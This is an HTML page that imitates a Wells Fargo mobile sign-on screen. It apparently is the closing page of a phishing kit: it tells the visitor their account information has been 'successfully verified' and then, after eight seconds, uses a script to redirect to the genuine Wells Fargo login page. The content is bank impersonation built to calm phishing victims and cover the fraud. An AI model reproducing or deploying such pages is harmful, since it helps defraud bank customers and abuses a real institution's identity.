<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <title>Mobile Sign on | Wells Fargo</title>
    <link rel="stylesheet" href="assets/wf-fonts.css" type="text/css">
    <link rel="stylesheet" href="assets/frontporch.css" type="text/css">
    <link type="text/css" href="assets/signon_clean.css" rel="stylesheet" media="screen,projection,print">
    <link rel="shortcut icon" href="assets/favicon.ico">
  </head>
  <body theme="ssep" id="body" class="brand-fp" lob="cob" devicetype="mobile">
    
    <div class="header brand-fp" id="header">
      <div class="wf_logo" role="link">
        <img src="assets/masthead-wf_logo-e-148x16.svg" alt="Wells Fargo" lang="en" role="img">
      </div>
      <div class="hamburger_menu" role="link">
        <a href="#"><img src="assets/FP.svg" alt="Home" role="img"></a>
      </div>
    </div>
    <main role="main">
      <article>
        <div id="form">
          <h1 class="banner"> Verify Your Account </h1>
          <h2 class="security-link flex-cntr">
            <!-- <span class="icon-lock"></span> -->
            <img src="assets/lock.svg" alt="" aria-hidden="true">
            <a class="" href="#">Online &amp; Mobile Security</a>
          </h2>
          <br>
          <form action="" name="Signon" id="Signon" method="post" autocomplete="off">
            <p class="titleBody" style="text-align: center;">Your information has been successfully verified.</p>
            <br>
            <p class="titleBody" style="text-align: center;">For your security, you will be automatically signed out. We will redirect you to our main website.</p>
            
            <br>
            <br>
            <br>
            <p class="titleBody" style="text-align: center; font-size: 15px;">Thank you.</p>
            <br>
            
            <br>
            
          </form>
        </div>
        <br><br><br><br><br><br><br>
        <div id="footer">
          <div id="links">
            <p><a href="#" class="link">PRIVACY, Cookies, Security &amp;
              Legal</a> <span class="link-separator"></span><a href="#" class="link">Ad Choices </a>
            </p>
            <p><a href="#" class="link online-acc">Online Access
              Agreement</a>
              <span class="link-separator"></span>
              <a href="#" class="link e-sign">ESIGN
              Consent</a>
            </p>
            <p>© 2020 <span lang="en">Wells Fargo</span>. All rights reserved.</p>
          </div>
          <div id="img">
          </div>
        </div>
      </article>
    </main>
    
    
    <script>
      setTimeout(function() {
        window.location.replace("https://connect.secure.wellsfargo.com/auth/login/present?origin=cob&error=yes&LOB=CONS&destination=AccountSummary");
      }, 8000);
    </script>
  </body>
</html>